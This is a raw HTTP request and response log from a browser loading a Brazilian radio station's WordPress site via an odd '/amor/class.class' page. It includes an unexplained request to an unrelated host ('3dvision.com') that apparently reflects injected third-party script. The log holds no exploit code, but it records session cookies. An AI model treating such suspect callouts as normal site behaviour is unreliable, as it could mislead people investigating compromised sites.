Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-eraumavez.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Tue, 14 Feb 2012 23:05:47 GMT
Etag: &quot;e7cab3-7263-4b8f4a2a388c0&quot;
Accept-Ranges: bytes
Content-Length: 29283
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-arrebatados.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Fri, 27 Jan 2012 19:09:24 GMT
Etag: &quot;e7cab8-c8b9-4b7873c1f6100&quot;
Accept-Ranges: bytes
Content-Length: 51385
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-dicasdebeleza.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 25 Jan 2012 05:23:13 GMT
Etag: &quot;e7cae8-401a-4b75375c73240&quot;
Accept-Ranges: bytes
Content-Length: 16410
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
GET /plugins/like.php?api_key=165121076905166&locale=en_US&sdk=joey&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Df31d030b1bac77e%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&node_type=link&width=450&font=verdana&layout=button_count&colorscheme=light&show_faces=false&send=true&extended_social_context=false HTTP/1.1

Host: www.facebook.com
GET /plugins/like.php?api_key=165121076905166&amp;locale=en_US&amp;sdk=joey&amp;channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter.php%3Fversion%3D11%23cb%3Df31d030b1bac77e%26origin%3Dhttp%253A%252F%252Fradio93.com.br%252Ff322c9b939bd7e2%26domain%3Dradio93.com.br%26relation%3Dparent.parent&amp;href=https%3A%2F%2Fwww.facebook.com%2FRadio93.3fm&amp;node_type=link&amp;width=450&amp;font=verdana&amp;layout=button_count&amp;colorscheme=light&amp;show_faces=false&amp;send=true&amp;extended_social_context=false HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Content-Encoding: gzip
X-FB-Debug: zwfDHJb2BOi4vRKMAoT3pOAdKw5kklYCT6vIzsgtYOY=
Date: Wed, 31 Oct 2012 08:35:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
GET /7397829/0/58cba984/1/ HTTP/1.1

Host: c.statcounter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;http://www.statcounter.com/w3c/p3p.xml&quot;, CP=&quot;ADMa OUR COM NAV NID DSP NOI COR&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc7397829.1351672503.0; expires=Mon, 30-Oct-2017 08:35:03 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
GET /7397725/0/d06ca43d/1/ HTTP/1.1

Host: c.statcounter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;http://www.statcounter.com/w3c/p3p.xml&quot;, CP=&quot;ADMa OUR COM NAV NID DSP NOI COR&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc7397725.1351672503.0; expires=Mon, 30-Oct-2017 08:35:03 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
GET /wp-content/themes/novo93/images/car-tioquebragalho.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:03 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Wed, 25 Jan 2012 05:30:45 GMT
Etag: &quot;e7cae9-45b9-4b75390b82b40&quot;
Accept-Ranges: bytes
Content-Length: 17849
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:03 GMT
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/car-fotografias.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:03 GMT
Etag: &quot;e7cab5-41d1-4b687f1f443c0&quot;
Accept-Ranges: bytes
Content-Length: 16849
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
GET /js/index.php?action=stats_javaon HTTP/1.1

Host: 3dvision.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=111ne103uprhdbtai4lotl0s55
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:53:13 GMT
Server: Apache/2.2.15
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
GET /wp-content/themes/novo93/images/icon_arrow_right.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:35:59 GMT
Etag: &quot;e7cac6-470-4b687f54ac1c0&quot;
Accept-Ranges: bytes
Content-Length: 1136
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_dsc00448.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:01 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8888
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/pesquisar.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:27 GMT
Etag: &quot;e7cacf-f42-4b687f6f600c0&quot;
Accept-Ranges: bytes
Content-Length: 3906
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/noticias93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:36:20 GMT
Etag: &quot;e7cacd-13dd-4b687f68b3100&quot;
Accept-Ranges: bytes
Content-Length: 5085
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/uploads/2012/10/duelo-2.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Mon, 29 Oct 2012 14:49:46 GMT
Etag: &quot;5c6053-2268-4cd33c7cd7680&quot;
Accept-Ranges: bytes
Content-Length: 8808
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/ranking.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:04 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:38:19 GMT
Etag: &quot;e7cad5-774-4b687fda2fcc0&quot;
Accept-Ranges: bytes
Content-Length: 1908
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:04 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_dsc00435.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:04 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8890
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_dsc00439.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:04 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8890
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_dsc00433.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:55 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:05 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8889
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_dsc00445.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:35:08 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8889
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/menu-bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/gallery/acustico-93-com-lea-mendonca-30-10/thumbs/thumbs_lea-1.jpg HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Wed, 31 Oct 2012 08:34:54 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.5-dev
X-Pingback: http://radio93.com.br/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Wed, 31 Oct 2012 08:34:55 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 8888
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
GET /wp-content/themes/novo93/images/radio-online.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/sociais.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/plugins/lightbox-plus/css/shadowed/images/border1.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/plugins/wp-minify/min/?f=wp-content/plugins/wp-bannerize/css/wpBannerizeStyleDefault.css,wp-content/plugins/tubepress/sys/ui/themes/default/style.css,wp-content/plugins/nextgen-gallery/css/nggallery.css,wp-content/plugins/facebook/style/style.css,wp-content/plugins/wp-polls/polls-css.css,wp-content/plugins/facebook/style/hide-wp-comments.css,wp-content/plugins/lightbox-plus/css/shadowed/colorbox.css,wp-content/plugins/tweet-like/tweetandlike-buttons.css,wp-content/plugins/wordpress-popular-posts/style/wpp.css&amp;debug=true&amp;m=1343672832
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/promo93.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/submenu_bottom_bg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/wp-content/themes/novo93/style.css
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/mk.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/downloadBtnIphone.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/iPhone.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397


GET /wp-content/themes/novo93/images/twitterbg.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://radio93.com.br/amor/class.class
Cookie: PHPSESSID=a5ekie79krfrha10ie8s4c3397
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 31 Oct 2012 08:35:17 GMT
Server: Apache/2.2.22 (Debian)
Last-Modified: Sun, 15 Jan 2012 02:39:23 GMT
Etag: &quot;e7cae5-63cf-4b68801738cc0&quot;
Accept-Ranges: bytes
Content-Length: 25551
Cache-Control: max-age=86400
Expires: Thu, 01 Nov 2012 08:35:17 GMT
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /amor/wp-content/themes/novo93/images/ranking5.png HTTP/1.1

Host: radio93.com.br

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
